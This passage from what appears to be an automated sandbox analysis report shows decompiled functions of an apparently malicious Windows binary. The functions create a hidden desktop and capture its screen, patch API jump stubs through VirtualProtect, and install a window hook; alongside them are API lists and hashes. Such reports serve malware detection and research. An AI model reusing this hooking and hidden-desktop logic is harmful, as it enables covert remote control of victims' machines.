				_t89 = __r8;
				_t84 = __rbp;
				_t82 = __rsi;
				_t66 = __rbx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t81 = __rcx;
				E00C78C30(__edx, __rdx);
				_t65 =  *((intOrPtr*)(__rdx + 0x20));
				_t59 =  *(_t65 + 0x15c);
				_t60 =  *(_t65 + 0x158);
				r15d =  *(_t65 + 0x160) & 0x0000ffff;
				E00C78CF0();
				GetCurrentThreadId();
				GetThreadDesktop(??);
				 *__rcx = _t65;
				GetDesktopWindow();
				__rcx[6] =  *(_t65 + 0x154);
				_t52 = (r15w & 0xffffffff) >> 3;
				__rcx[0xa] = _t65;
				_t56 = (_t52 & 0x0000ffff) * _t60;
				_t38 = _t56 * _t59;
				if((_t38 & 0x0000000f) != 0) {
					_t38 = (_t38 & 0xfffffff0) + 0x10;
				}
				 *(_t81 + 0x216) = _t52;
				 *(_t81 + 0x21c) = _t56;
				 *(_t81 + 0x210) = _t59;
				 *(_t81 + 0x20c) = _t60;
				 *(_t81 + 0x214) = r15w;
				 *(_t81 + 0x218) = _t38;
				lstrcpyA(??, ??);
				_t40 = lstrlenA(??);
				r8d = 0;
				 *(_t81 + 0x6e8) = _t40;
				CreateMutexA(??, ??, ??);
				 *(_t81 + 0x6e0) = _t65;
				if(_t65 != 0) {
					_t24 = _t81 + 0x220; // 0x2a8
					r9d = _t60;
					r8d = _t59;
					_t80 =  &_v40;
					E00C7EADC(_t65, _t66, _t24, _t80, _t89, _t90);
					_t26 = _t80 + 1; // 0x1
					r8d = _t26;
					_t43 = E00C7DBCC(_t65, _t66, _t81, _t80, _t82, _t84);
					_t49 = _t43;
					if(_t43 == 0) {
						_t44 = 0;
					} else {
						CloseHandle();
						 *(_t81 + 0x6e0) =  *(_t81 + 0x6e0) & 0x00000000;
						_t44 = _t49;
					}
				} else {
					_t44 = GetLastError();
				}
				return _t44;
			}

0x00c7e238
0x00c7e238
0x00c7e238
0x00c7e238
0x00c7e238
0x00c7e238
0x00c7e23d
0x00c7e242
0x00c7e250
0x00c7e259
0x00c7e25e
0x00c7e26b
0x00c7e271
0x00c7e277
0x00c7e27f
0x00c7e284
0x00c7e28c
0x00c7e292
0x00c7e295
0x00c7e29f
0x00c7e2a2
0x00c7e2a6
0x00c7e2ad
0x00c7e2b2
0x00c7e2b7
0x00c7e2bc
0x00c7e2bc
0x00c7e2bf
0x00c7e2cb
0x00c7e2d8
0x00c7e2de
0x00c7e2e4
0x00c7e2ec
0x00c7e2f9
0x00c7e306
0x00c7e30c
0x00c7e313
0x00c7e319
0x00c7e31f
0x00c7e329
0x00c7e333
0x00c7e33a
0x00c7e33d
0x00c7e340
0x00c7e345
0x00c7e34f
0x00c7e34f
0x00c7e353
0x00c7e358
0x00c7e35c
0x00c7e377
0x00c7e35e
0x00c7e365
0x00c7e36b
0x00c7e373
0x00c7e373
0x00c7e32b
0x00c7e32b
0x00c7e32b
0x00c7e391

APIs

Part of subcall function 00C78C30: WaitForSingleObject.KERNEL32(?,?,00000000,00C7E25E,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C78C3E

GetCurrentThreadId.KERNEL32 ref: 00C7E284
GetThreadDesktop.USER32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E28C
GetDesktopWindow.USER32 ref: 00C7E295
lstrcpyA.KERNEL32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E2F9
lstrlenA.KERNEL32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E306
CreateMutexA.KERNEL32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E319
GetLastError.KERNEL32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E32B

Part of subcall function 00C7EADC: GetDC.USER32 ref: 00C7EB0F
Part of subcall function 00C7EADC: GetDeviceCaps.GDI32 ref: 00C7EB22
Part of subcall function 00C7EADC: ReleaseDC.USER32 ref: 00C7EE18

Part of subcall function 00C7DBCC: GetDC.USER32 ref: 00C7DBF2
Part of subcall function 00C7DBCC: SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC0E
Part of subcall function 00C7DBCC: DeleteObject.GDI32 ref: 00C7DC1B
Part of subcall function 00C7DBCC: DeleteDC.GDI32 ref: 00C7DC28
Part of subcall function 00C7DBCC: CreateCompatibleDC.GDI32 ref: 00C7DC31
Part of subcall function 00C7DBCC: GetLastError.KERNEL32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC43
Part of subcall function 00C7DBCC: SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DD2D
Part of subcall function 00C7DBCC: DeleteObject.GDI32 ref: 00C7DD47
Part of subcall function 00C7DBCC: DeleteDC.GDI32 ref: 00C7DD61
Part of subcall function 00C7DBCC: SelectObject.GDI32 ref: 00C7DD94
Part of subcall function 00C7DBCC: DeleteObject.GDI32 ref: 00C7DDAE
Part of subcall function 00C7DBCC: DeleteDC.GDI32 ref: 00C7DDC8
Part of subcall function 00C7DBCC: ReleaseDC.USER32 ref: 00C7DDE0

CloseHandle.KERNEL32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E365

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Object$Delete$Select$CreateDesktopErrorLastReleaseThread$CapsCloseCompatibleCurrentDeviceHandleMutexSingleWaitWindowlstrcpylstrlen
String ID:
API String ID: 3932841243-0
Opcode ID: fe8d4a15274e399b6428fd2b6646c3c6fa4d6b84c28d52f8cf9816cad1a1a260
Instruction ID: de6f4728779e32929c2db75156b7e9a80b490c459c7d73404f64a7c63973a4af
Opcode Fuzzy Hash: fe8d4a15274e399b6428fd2b6646c3c6fa4d6b84c28d52f8cf9816cad1a1a260
Instruction Fuzzy Hash: F0318A76700B8197E718DF26E94879DB7A1F788B80F448226DF5987B21DF38D0798744

Uniqueness

Uniqueness Score: -1.00%

Function 00C67D70, Relevance: 12.0, APIs: 4, Strings: 4, Instructions: 49stringCOMMON

Download Yara Rule

APIs

lstrcmpiA.KERNEL32 ref: 00C67DB4
lstrcmpiA.KERNEL32 ref: 00C67DC8
lstrcmpiA.KERNEL32 ref: 00C67DDC
lstrcmpiA.KERNEL32 ref: 00C67DF0

Strings

Direct3DCreate9Ex, xrefs: 00C67DE6
CreateDXGIFactory1, xrefs: 00C67DAA
D3D10CreateDevice1, xrefs: 00C67DBE
Direct3DCreate9, xrefs: 00C67DD2

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmpi
String ID: CreateDXGIFactory1$D3D10CreateDevice1$Direct3DCreate9$Direct3DCreate9Ex
API String ID: 1586166983-74941414
Opcode ID: ce584eecf9887a53cd8ba29bffa45e051693dcd0b0ed8fa246d4c1685dc17899
Instruction ID: 6e85a0df4d508ec040cab583a821455291ceff0124946b85ba3a8190d99140b9
Opcode Fuzzy Hash: ce584eecf9887a53cd8ba29bffa45e051693dcd0b0ed8fa246d4c1685dc17899
Instruction Fuzzy Hash: D0116121308B4282FB259F16EDD47792365EB84BC4F888621DD1A87B14EF3CC94AD354

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F004, Relevance: 10.7, APIs: 7, Instructions: 174sleepCOMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32 ref: 00C7F06C
IntersectRect.USER32 ref: 00C7F167
CreateRectRgn.GDI32 ref: 00C7F17F
CombineRgn.GDI32 ref: 00C7F1A4
DeleteObject.GDI32 ref: 00C7F1DC
Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C7F20F
DeleteObject.GDI32 ref: 00C7F244

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Rect$CreateDeleteObject$CombineIntersectSleep
String ID:
API String ID: 1191493533-0
Opcode ID: dd1f6d5cc443e8843cefde764eaaca30f1c778651b0492abbc76f6d94043f8ce
Instruction ID: 1165065fcaa13a9a8f8977481ab67aac01c9824d2b91266b2d6b43f9a475ccd5
Opcode Fuzzy Hash: dd1f6d5cc443e8843cefde764eaaca30f1c778651b0492abbc76f6d94043f8ce
Instruction Fuzzy Hash: 4C614A36B006408FE714CFB9E894BAD37B5F798B8CF508129DE0A97B58DE399506CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C62DA4, Relevance: 10.6, APIs: 7, Instructions: 146
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00C62DA4(void* __esi, int __rbx, long long __rcx, intOrPtr __rdx, int __rdi, int __rsi, void* __rbp, long long __r9, int __r12, void* _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				signed int _v48;
				signed int _v52;
				long _v56;
				long _t60;
				int _t64;
				signed int _t68;
				int* _t91;
				long long _t92;
				long long _t95;
				long long _t100;
				long long _t106;
				intOrPtr _t115;
				intOrPtr _t116;
				long long _t118;
				long long _t121;
				int* _t124;
				intOrPtr _t134;
				intOrPtr _t138;
				int* _t140;
				long long _t143;

				_t123 = __rbp;
				_t118 = __rdi;
				_t115 = __rdx;
				_t98 = __rbx;
				_t91 = _t124;
				_t91[2] = __rbx;
				_t91[4] = __rsi;
				_t91[6] = __rdi;
				_t91[8] = __r12;
				_t121 = __r9;
				_t68 = r8d;
				_t134 = __rdx;
				_t143 = __rcx;
				_t80 =  *(__rcx + 8) & 0x00000001;
				if(( *(__rcx + 8) & 0x00000001) == 0) {
					_t115 =  *((intOrPtr*)(__rcx + 0x10));
					E00C6412C(__eflags, _t91, __rbx, __rdx, _t115, __r9, __rbp);
				} else {
					E00C641D4( *(__rcx + 0x18) & 0x0000ffff, _t80, _t91, __rbx, __rdx, __rdx);
				}
				_t140 = _t91;
				if(_t91 == 0) {
					_t60 = 2;
					goto L22;
				} else {
					_v48 = _v48 & 0x00000000;
					_t13 = _t115 + 0x3c; // 0x40
					r8d = _t13;
					if(VirtualProtect(??, ??, ??, ??) == 0) {
						_t60 = GetLastError();
						goto L22;
					} else {
						 *((long long*)(_t121 + 0x30)) = _t143;
						_t92 = _t91 + _t134;
						 *((long long*)(_t121 + 0x10)) = _t92;
						 *(_t121 + 0x18) = _t140;
						 *((long long*)(_t121 + 0x20)) = _t92;
						r8d = _t68;
						_t116 = _t134;
						_t60 = E00C62714(_t98, _t143, _t116, _t121, _t123, _t121);
						_v56 = _t60;
						if(_t60 == 1) {
							_t138 =  *((intOrPtr*)(_t121 + 0x10));
							_v40 = _t118;
							_t64 = E00C64360(0x22000020, _t98, _t134, _t116, _t121, _t123);
							_t106 = _t92;
							_v32 = _t92;
							while(1) {
								L7:
								while(_t106 != 0) {
									if(_t118 != 0 ||  *(_t106 + 0x10) < 0xe) {
										L15:
										_t100 =  *_t106;
										E00C61E84();
										_t106 = _t100;
										_v32 = _t100;
										goto L7;
									} else {
										_t118 =  *((intOrPtr*)(_t106 + 8));
										_v40 = _t118;
										if( *_t118 != 0x25ff ||  *(_t118 + 2) != 0 ||  *((intOrPtr*)(_t118 + 6)) == _t138) {
											goto L15;
										} else {
											 *((long long*)(_t106 + 8)) = _t118 + 0xe;
											_t64 = _t116 - 0xe;
											 *(_t106 + 0x10) = _t64;
											_v40 = _t118;
											continue;
										}
									}
									L22:
									_v56 = _t60;
									goto L23;
								}
								__eflags = _t118;
								if(_t118 != 0) {
									_t34 = _t116 + 0x32; // 0x40
									r8d = _t34;
									_t64 = VirtualProtect(??, ??, ??, ??);
									__eflags = _t64;
									if(_t64 != 0) {
										 *(_t118 + 2) =  *(_t118 + 2) & 0x00000000;
										 *((long long*)(_t118 + 6)) =  *((intOrPtr*)(_t121 + 0x28));
										 *_t118 = 0x25ff;
										 *((long long*)(_t121 + 0x28)) = _t118;
										 *((long long*)(_t143 + 0x28)) = _t118;
										r8d = _v52;
										__eflags = r8d - 0x40;
										r8d =  !=  ? 0x20 : r8d;
										_v52 = r8d;
										_t64 = VirtualProtect(??, ??, ??, ??);
									}
								}
								 *_t140 = _t64;
								r8d = _v48;
								VirtualProtect(??, ??, ??, ??);
								 *(_t121 + 0x38) =  *(_t121 + 0x38) | 0x00000102;
								EnterCriticalSection(??);
								_t95 =  *0xc95ab0; // 0xc95ab0
								 *_t121 = _t95;
								 *((long long*)(_t121 + 8)) = 0xc95ab0;
								 *((long long*)(_t95 + 8)) = _t121;
								 *0xc95ab0 = _t121;
								LeaveCriticalSection(??);
								 *((long long*)(_t143 + 0x30)) =  *((intOrPtr*)(_t121 + 0x20)) + _t134;
								_t60 = 0;
								goto L22;
							}
						}
					}
				}
				L23:
				return _t60;
			}

0x00c62da4
0x00c62da4
0x00c62da4
0x00c62da4
0x00c62da4
0x00c62da7
0x00c62dab
0x00c62daf
0x00c62db3
0x00c62dc1
0x00c62dc4
0x00c62dc7
0x00c62dca
0x00c62dcd
0x00c62dd1
0x00c62de1
0x00c62de8
0x00c62dd3
0x00c62dda
0x00c62dda
0x00c62ded
0x00c62df3
0x00c62fa7
0x00000000
0x00c62df9
0x00c62df9
0x00c62e08
0x00c62e08
0x00c62e17
0x00c62f9f
0x00000000
0x00c62e1d
0x00c62e1d
0x00c62e24
0x00c62e27
0x00c62e2b
0x00c62e32
0x00c62e39
0x00c62e3c
0x00c62e42
0x00c62e47
0x00c62e4e
0x00c62e54
0x00c62e5a
0x00c62e67
0x00c62e6c
0x00c62e6f
0x00c62e74
0x00c62e74
0x00c62e79
0x00c62e81
0x00c62ebc
0x00c62ebc
0x00c62ebf
0x00c62ec4
0x00c62ec7
0x00000000
0x00c62e8b
0x00c62e8b
0x00c62e8f
0x00c62e97
0x00000000
0x00c62ea5
0x00c62ea9
0x00c62ead
0x00c62eb0
0x00c62eb5
0x00000000
0x00c62eb5
0x00c62e97
0x00c62fac
0x00c62fac
0x00000000
0x00c62fac
0x00c62ece
0x00c62ed1
0x00c62edd
0x00c62edd
0x00c62ee4
0x00c62eea
0x00c62eec
0x00c62eee
0x00c62ef6
0x00c62efa
0x00c62efd
0x00c62f01
0x00c62f05
0x00c62f0f
0x00c62f13
0x00c62f17
0x00c62f27
0x00c62f27
0x00c62eec
0x00c62f34
0x00c62f3c
0x00c62f49
0x00c62f4f
0x00c62f5d
0x00c62f63
0x00c62f6a
0x00c62f74
0x00c62f78
0x00c62f7c
0x00c62f8a
0x00c62f97
0x00c62f9b
0x00000000
0x00c62f9b
0x00c62e74
0x00c62e4e
0x00c62e17
0x00c62fb0
0x00c62fd4

APIs

VirtualProtect.KERNEL32 ref: 00C62E0F
VirtualProtect.KERNEL32 ref: 00C62EE4
VirtualProtect.KERNEL32 ref: 00C62F27
VirtualProtect.KERNEL32 ref: 00C62F49
EnterCriticalSection.KERNEL32 ref: 00C62F5D
LeaveCriticalSection.KERNEL32 ref: 00C62F8A

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual$CriticalSection$EnterLeave
String ID:
API String ID: 1801948497-0
Opcode ID: ff7e910166a6830e842cb8f13f0e5eb7b5e687ca2c3e02578f7e5426a1f0bb2c
Instruction ID: e50a4c407b3620d1acdb1751dbf674d9a869e986f4b88dc18dbc6c44be8d92be
Opcode Fuzzy Hash: ff7e910166a6830e842cb8f13f0e5eb7b5e687ca2c3e02578f7e5426a1f0bb2c
Instruction Fuzzy Hash: 03517D32214B4086EB34CF12E98471EB3B4F788B85F548226EF9A43B64DF38D956CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F758, Relevance: 10.6, APIs: 7, Instructions: 105
memorystringsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00C7F758(void* __esi, void* __ebp, void* __eflags, DWORD* __rax, long long __rbx, long long __rcx, long long* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24, long _a32) {
				void* __rdi;
				long _t17;
				long _t26;
				long _t27;
				long _t28;
				long _t29;
				long _t31;
				long _t32;
				int _t33;
				void* _t41;
				void* _t42;
				DWORD* _t57;
				long long _t77;
				DWORD* _t79;
				void* _t82;
				void* _t87;
				void* _t89;
				long long* _t91;
				long long _t92;

				_t87 = __r8;
				_t58 = __rbx;
				_t57 = __rax;
				_t42 = __ebp;
				_t41 = __esi;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t82 = __r8;
				_t91 = __rdx;
				_t92 = __rcx;
				_t17 = GetTickCount();
				_t4 = _t77 + 1; // 0x1
				r9d = _t4;
				r8d = 0;
				_a32 = _t17;
				E00C77E6C(__eflags, __rbx,  &_a32, __rdx, _t77, __rsi, __r8, __r8);
				_t79 = _t57;
				if(_t57 == 0) {
					L10:
					_t32 = GetLastError();
					L11:
					if(_t79 != 0) {
						HeapFree();
					}
					if(_t32 != 0 && _t77 != 0) {
						E00C7F6A8();
					}
					return _t32;
				}
				_t33 = lstrlenA();
				_t7 = _t57 + 1; // 0x1
				r8d = _t7;
				_t89 = _t87 + 0x778;
				HeapAlloc(??, ??, ??);
				_t77 = _t57;
				if(_t57 == 0) {
					goto L10;
				}
				r8d = 0x778;
				memset(??, ??, ??);
				r8d = 0;
				 *((long long*)(_t77 + 8)) = _t92;
				CreateMutexA(??, ??, ??);
				 *((long long*)(_t77 + 0x10)) = _t57;
				if(_t57 == 0) {
					goto L10;
				}
				_t90 = _t82;
				r8d = _t33;
				_t26 = E00C7D800(_t58, _t77, _t79, _t82);
				_t32 = _t26;
				if(_t26 == 0) {
					r8d =  *((intOrPtr*)(_t77 + 0x2a0));
					_t11 = _t77 + 0x18; // 0x18
					_t76 = _t11;
					_t13 = _t57 + 1; // 0x1
					r9d = _t13;
					_t27 = E00C788A0(_t57, _t58, _t11);
					_t32 = _t27;
					if(_t27 == 0) {
						E00C7F500();
						_t28 = E00C825BC(_t32, 0, _t57, _t58, _t77, _t79, _t89, _t90);
						_t32 = _t28;
						if(_t28 == 0) {
							_t29 = E00C7DED4(_t41, _t42, _t58, _t77, _t76, _t77, _t79, _t82, _t89, _t90);
							_t32 = _t29;
							if(_t29 == 0) {
								E00C833C0(_t77);
								_t31 = E00C7D428(_t57, _t58, _t77);
								_t32 = _t31;
								if(_t31 == 0) {
									 *_t91 = _t77;
								}
							}
						}
					}
				}
				if(_t32 != 0xffffffff) {
					goto L11;
				}
				goto L10;
			}

0x00c7f758
0x00c7f758
0x00c7f758
0x00c7f758
0x00c7f758
0x00c7f758
0x00c7f75d
0x00c7f762
0x00c7f770
0x00c7f773
0x00c7f776
0x00c7f77b
0x00c7f781
0x00c7f781
0x00c7f785
0x00c7f78d
0x00c7f793
0x00c7f798
0x00c7f79e
0x00c7f879
0x00c7f87f
0x00c7f881
0x00c7f884
0x00c7f892
0x00c7f892
0x00c7f89a
0x00c7f8a4
0x00c7f8a4
0x00c7f8c3
0x00c7f8c3
0x00c7f7b6
0x00c7f7b8
0x00c7f7b8
0x00c7f7bc
0x00c7f7c3
0x00c7f7c9
0x00c7f7cf
0x00000000
0x00000000
0x00c7f7d7
0x00c7f7e0
0x00c7f7e5
0x00c7f7e8
0x00c7f7f0
0x00c7f7f6
0x00c7f7fd
0x00000000
0x00000000
0x00c7f7ff
0x00c7f802
0x00c7f80b
0x00c7f810
0x00c7f814
0x00c7f816
0x00c7f81d
0x00c7f81d
0x00c7f828
0x00c7f828
0x00c7f82c
0x00c7f831
0x00c7f835
0x00c7f83a
0x00c7f842
0x00c7f847
0x00c7f84b
0x00c7f850
0x00c7f855
0x00c7f859
0x00c7f85e
0x00c7f866
0x00c7f86b
0x00c7f86f
0x00c7f871
0x00c7f871
0x00c7f86f
0x00c7f859
0x00c7f84b
0x00c7f835
0x00c7f877
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00C7F77B

Part of subcall function 00C77E6C: lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EBD
Part of subcall function 00C77E6C: lstrlenA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77ECD
Part of subcall function 00C77E6C: HeapAlloc.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EE1
Part of subcall function 00C77E6C: lstrcpyA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77EFD
Part of subcall function 00C77E6C: lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F09
Part of subcall function 00C77E6C: lstrcatA.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F1A
Part of subcall function 00C77E6C: HeapFree.KERNEL32(?,?,?,?,00000000,00C78917), ref: 00C77F2C

lstrlenA.KERNEL32(?,?,?,00C6C267), ref: 00C7F7A7
HeapAlloc.KERNEL32(?,?,?,00C6C267), ref: 00C7F7C3
memset.NTDLL(?,?,?,00C6C267), ref: 00C7F7E0
CreateMutexA.KERNEL32(?,?,?,00C6C267), ref: 00C7F7F0

Part of subcall function 00C7D800: CreateDesktopA.USER32 ref: 00C7D844
Part of subcall function 00C7D800: GetLastError.KERNEL32 ref: 00C7D852
Part of subcall function 00C7D800: CloseDesktop.USER32 ref: 00C7D955

Part of subcall function 00C788A0: GetUserObjectInformationA.USER32 ref: 00C788E6
Part of subcall function 00C788A0: CreateEventA.KERNEL32 ref: 00C789E5
Part of subcall function 00C788A0: CreateEventA.KERNEL32 ref: 00C78A08
Part of subcall function 00C788A0: CreateMutexExA.KERNEL32 ref: 00C78A27

Part of subcall function 00C7F500: EnterCriticalSection.KERNEL32(?,?,00000000,00C7F83F,?,?,?,00C6C267), ref: 00C7F510

Part of subcall function 00C7DED4: GetVersion.KERNEL32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DEF7
Part of subcall function 00C7DED4: GetCurrentThreadId.KERNEL32 ref: 00C7DEFD
Part of subcall function 00C7DED4: GetThreadDesktop.USER32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF08
Part of subcall function 00C7DED4: SetThreadDesktop.USER32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF15
Part of subcall function 00C7DED4: GetLastError.KERNEL32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF1F

Part of subcall function 00C833C0: CreateThread.KERNEL32 ref: 00C833F1

Part of subcall function 00C7D428: CreateMutexA.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D43E
Part of subcall function 00C7D428: CreateEventA.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D45A
Part of subcall function 00C7D428: CreateThread.KERNEL32 ref: 00C7D483
Part of subcall function 00C7D428: GetLastError.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D495
Part of subcall function 00C7D428: CloseHandle.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D4AD
Part of subcall function 00C7D428: CloseHandle.KERNEL32(?,?,?,?,00000000,00C7F86B,?,?,?,00C6C267), ref: 00C7D4C7

GetLastError.KERNEL32(?,?,?,00C6C267), ref: 00C7F879
HeapFree.KERNEL32(?,?,?,00C6C267), ref: 00C7F892

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Create$Thread$DesktopErrorHeapLast$CloseEventMutexlstrlen$AllocFreeHandlelstrcat$CountCriticalCurrentEnterInformationObjectSectionTickUserVersionlstrcpymemset
String ID:
API String ID: 3949088790-0
Opcode ID: 446b54d96a23c14c2361a71ee0e8e0358d77f6f49c8e285defcba825d8f49efa
Instruction ID: d17f2c308b5d718380ae9da9c791afb904442a73ec88196183c0ce9037be9e4f
Opcode Fuzzy Hash: 446b54d96a23c14c2361a71ee0e8e0358d77f6f49c8e285defcba825d8f49efa
Instruction Fuzzy Hash: 9231B221704B4282EB15EBB7A9D473D63A1BB86FD0F44C1389E1D47B65EF38C9568701

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A200, Relevance: 10.6, APIs: 7, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00C62011), ref: 00C6A227
GetVersion.KERNEL32(?,?,?,00C62011), ref: 00C6A243
SetWindowsHookExA.USER32 ref: 00C6A287
EnterCriticalSection.KERNEL32(?,?,?,00C62011), ref: 00C6A29D
LeaveCriticalSection.KERNEL32(?,?,?,00C62011), ref: 00C6A2E0
HeapFree.KERNEL32(?,?,?,00C62011), ref: 00C6A2F6
GetLastError.KERNEL32(?,?,?,00C62011), ref: 00C6A30D

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalHeapSection$AllocEnterErrorFreeHookLastLeaveVersionWindows
String ID:
API String ID: 1643053347-0
Opcode ID: 95b3d8248d3b6af5a434bb6a05eb2a6cd356ea2c0c6883e6dbd34b2c3726c283
Instruction ID: 6c01e0f9e964ee5ab1a2165ca2f3470061dbe5db2745068a49da142d37c59c81
Opcode Fuzzy Hash: 95b3d8248d3b6af5a434bb6a05eb2a6cd356ea2c0c6883e6dbd34b2c3726c283
Instruction Fuzzy Hash: 34316C72201F40C2EB24AF55F8A071873A1F788F84F988525DA5E93B24EF39CA95CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00C7AD34, Relevance: 10.6, APIs: 7, Instructions: 65stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00C7AF25,?,?,?,00C7AE5F), ref: 00C7AD5F
lstrlenW.KERNEL32(?,?,00000000,00C7AF25,?,?,?,00C7AE5F), ref: 00C7AD82
HeapAlloc.KERNEL32(?,?,00000000,00C7AF25,?,?,?,00C7AE5F), ref: 00C7ADA3
lstrcpyW.KERNEL32 ref: 00C7ADB7
lstrcatW.KERNEL32 ref: 00C7ADD5
lstrcatW.KERNEL32 ref: 00C7ADE1
HeapFree.KERNEL32(?,?,00000000,00C7AF25,?,?,?,00C7AE5F), ref: 00C7ADF3

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heaplstrcatlstrlen$AllocFreelstrcpy
String ID:
API String ID: 3031435114-0
Opcode ID: 3c51ccfb869083e67b2dbbd7ef73e728c0b707ec9876932307712990fa6137ad
Instruction ID: 7a634e37dfcfe000272edd022fd47c0e5cf009b0a52cb11d679b3d024f842253
Opcode Fuzzy Hash: 3c51ccfb869083e67b2dbbd7ef73e728c0b707ec9876932307712990fa6137ad
Instruction Fuzzy Hash: 18219A65305B8582EB28DF56A948729B3A1BB9CFD1F88C125CE1A47F24EF3CC545C704

Uniqueness

Uniqueness Score: -1.00%

